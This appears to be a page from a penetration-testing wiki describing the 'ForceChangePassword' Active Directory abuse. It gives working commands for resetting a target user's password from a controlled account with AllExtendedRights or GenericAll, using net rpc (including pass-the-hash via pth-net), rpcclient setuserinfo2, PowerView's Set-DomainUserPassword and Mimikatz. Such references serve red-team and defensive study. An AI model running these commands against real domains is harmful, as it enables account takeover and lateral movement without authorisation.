ForceChangePassword
This abuse can be carried out when controlling an object that has AllExtendedRights, or GenericAll over a target user.
UNIX-like
Windows
It can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.
1
# With net and cleartext credentials (will be prompted)
2
net rpc password $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController
3
โ€‹
4
# With net and cleartext credentials
5
net rpc password $TargetUser -U $DOMAIN/$ControlledUser%$Password -S $DomainController
6
โ€‹
7
# With Pass-the-Hash
8
pth-net rpc password $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainController
Copied!
The rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.
1
rpcclient -U $DOMAIN/$ControlledUser $DomainController
2
rpcclient $> setuserinfo2 $TargetUser 23 $NewPassword
Copied!
The attacker can change the password of the user. This can be achieved with Set-DomainUserPassword (PowerView module).
1
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
2
Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword
Copied!
Mimikatz's lsadump::setntlm can also be used for that purpose.
Last modified 29d ago
Copy link